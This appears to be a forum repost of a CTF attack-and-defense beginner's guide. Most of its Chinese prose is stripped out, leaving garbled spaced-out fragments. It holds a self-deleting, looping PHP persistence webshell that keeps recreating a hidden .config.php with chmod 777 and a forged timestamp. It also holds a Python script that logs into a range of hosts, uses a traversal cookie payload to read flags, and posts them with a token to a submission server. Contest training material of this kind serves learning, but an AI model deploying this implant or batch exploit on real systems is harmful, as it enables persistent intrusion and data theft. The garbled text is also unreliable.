[21704] 2021-02-24_CTF线下攻防入门指南

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-02-24_CTF线下攻防入门指南 C T F 线 h a c k   L e m o n S e c   2 0 2 1 - 0 2 - 2 4 C T F 线 A t t a c k   &   D e f e n s e F l a g   1 . P y t h o n   ( S S T I ) F l a g N o d e j s   F l a g P H P   2 . 3 . C M S D Z   S S R F C M S   0 d a y / C M S 1
1   2 2   线 线
F l a g C T F 线 W e b D o w n 线 D o w n D W e b S h e l l 3 3   W e b S h e l l d i f f W e b S h e l l G e t S h e l l W e b S h e l l +
线 r o o t W e b S h e l l < ? p h p s e t _ t i m e _ l i m i t ( 0 ) ; i g n o r e _ u s e r _ a b o r t ( 1 ) ; u n l i n k ( _ _ F I L E _ _ ) ; w h i l e ( 1 ) {         f i l e _ p u t _ c o n t e n t s ( ' . c o n f i g . p h p ' ,   ' < ? p h p   p h p i n f o ( ) ; ? > ' ) ;         s y s t e m ( ' c h m o d   7 7 7   . c o n f i g . p h p ' ) ;           t o u c h ( " . c o n f i g . p h p " ,   m k t i m e ( 2 0 , 1 5 , 1 , 1 1 , 1 7 , 2 0 1 7 ) ) ;   u s l e e p ( 1 0 0 ) ; ? > W e b 线 W e b S h e l l 便 P O S T W e b 便 C T F P H P C M S 使 D D 使 S e a y 4
4                 F l a g F l a g F l a g 使 G e t S h e l l 访 F l a g F l a g F l a g F l a g 1 . . < ? p h p f i l e _ p u t _ c o n t e n t s ( ' . c o n f i g . p h p ' ,   ' < ? p h p   p h p i n f o ( ) ; ? > ' ) ;         ? > 2 . - - 使 r m r m - r o o t @ J D : ~ / t e s t #   e c h o   " 1 2 3 "   >   - t e s t . p h p r o o t @ J D : ~ / t e s t #   r m   - t e s t . p h p   r m :   i n v a l i d   o p t i o n   - -   ' t ' T r y   ' r m   . / - t e s t . p h p '   t o   r e m o v e   t h e   f i l e   ' - t e s t . p h p ' . T r y   ' r m   - - h e l p '   f o r   m o r e   i n f o r m a t i o n . r o o t @ J D : ~ / t e s t # 3 . 使 < ? p h p s e t _ t i m e _ l i m i t ( 0 ) ; i g n o r e _ u s e r _ a b o r t ( 1 ) ; u n l i n k ( _ _ F I L E _ _ ) ; w h i l e ( 1 ) {         f i l e _ p u t _ c o n t e n t s ( ' . c o n f i g . p h p ' ,   ' < ? p h p   p h p i n f o ( ) ; ? > ' ) ;
        s y s t e m ( ' c h m o d   7 7 7   . c o n f i g . p h p ' ) ;           t o u c h ( " . c o n f i g . p h p " ,   m k t i m e ( 2 0 , 1 5 , 1 , 1 1 , 1 7 , 2 0 1 7 ) ) ;   u s l e e p ( 1 0 0 ) ; ? > P H P P H P k i l l 使 - C T F 线 p a y l o a d F l a g 3 2 5 1 2 . 5 F l a g F l a g 2 . 5 4 F l a g 使 使 访 使 p a y l o a d F l a g # F l a g d e f   r e g i s t _ l o g i n _ g e t F l a g ( u r l ) :   d a t a   =   {     " u s e r n a m e " : " n s f o c u s " ,     " p a s s w o r d " : " n s f o c u s "   }   c o o k i e   =   { " P i c t u r e " : " Y T o x O n t z O j I 6 I m F h I j t z O j I 4 O i I u L i 8 u L i 8 u L i 8 u L i 8 u L i 8 u L i 8 u L i 8 u L i 9 m b G F n I j t 9 " }   r   =   r e q u e s t s . S e s s i o n ( )   u r l 1   =   u r l   +   " / i n d e x . p h p / r e g i s t e r "   u r l 2   =   u r l   +   " / i n d e x . p h p / l o g i n "   u r l 3   =   u r l   +   " / i n d e x . p h p / p i c t u r e "   r 1   =   r . p o s t ( u r l 1 , d a t a   =   d a t a )   r 2   =   r . p o s t ( u r l 2 , d a t a   =   d a t a )   r 3   =   r . g e t ( u r l 3 , c o o k i e s   = c o o k i e )   s t r _ r e s u l t   =   r 3 . t e x t   m a t c h   =   r e . c o m p i l e ( " < i m g   s r c = " d a t a : i m a g e / j p g ; b a s e 6 4 , ( . * ? ) "   > " )   t r y :
    r e s u l t _ s t r s _ l i s t   =   r e . f i n d a l l ( m a t c h , s t r _ r e s u l t )     p r i n t   s t r ( r e s u l t _ s t r s _ l i s t )     r e s u l t _ s t r s   =   r e s u l t _ s t r s _ l i s t [ 0 ]     F l a g   =   b a s e 6 4 . b 6 4 d e c o d e ( r e s u l t _ s t r s )     r e t u r n   F l a g   e x c e p t :     r e t u r n   0 #   F l a g d e f   p o s t _ F l a g ( F l a g ) :   u r l   =   " h t t p : / / 1 7 2 . 1 6 . 2 0 0 . 1 4 : 9 0 0 0 / s u b m i t _ F l a g / "   F l a g   =   s t r ( F l a g ) . r e p l a c e ( " n " , " " )   d a t a   =   { " t o k e n " : " Q h f F G d 6 A V A u c A W 4 k H X B D y d U n q S V Q c X A U b r j d u x C A m w m M C B J f w U U 4 Z t Q Y E 7 4 6 q e N K n K E D G E Y d F 6 2 " , " F l a g " : F l a g }   r e s = r e q u e s t s . p o s t ( u r l , d a t a , t i m e o u t = 1 )   p r i n t   r e s . t e x t i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :   f o r   x   i n   x r a n g e ( 1 , 3 2 ) :     u r l s   =   " h t t p : / / 1 7 2 . 1 6 . " + s t r ( x ) + " . 1 0 1 / "     p o s t _ F l a g ( r e g i s t _ l o g i n _ g e t F l a g ( u r l s ) ) 线 1 . 使 2 . G e t S h e l l R C E 3 . g e t s h e l l F l a g 5 0 5 F l a g 使 F l a g D o w n 4 . D o w n
L e m o n S e c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则